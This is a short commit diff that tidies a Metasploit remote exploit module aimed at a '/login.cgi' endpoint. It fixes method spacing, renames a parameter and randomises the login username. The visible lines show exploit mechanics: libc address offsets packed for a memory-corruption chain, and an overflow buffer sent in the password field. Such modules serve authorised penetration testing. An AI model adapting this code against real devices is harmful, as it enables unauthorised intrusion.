Clean up module and randomize username

master
William Vu 2019-04-12 14:23:57 -05:00
parent 2ebee1226f
commit 6326aa5dda
1 changed files with 4 additions and 4 deletions

View File

@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
))
end
def p (offset)
def p(offset)
[(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
end
@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
shellcode
end
def send_request (payload)
def send_request(buffer)
begin
send_request_cgi({
'uri' => '/login.cgi',
@ -111,8 +111,8 @@ class MetasploitModule < Msf::Exploit::Remote
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": "cisco",
"pwd": payload,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
}
})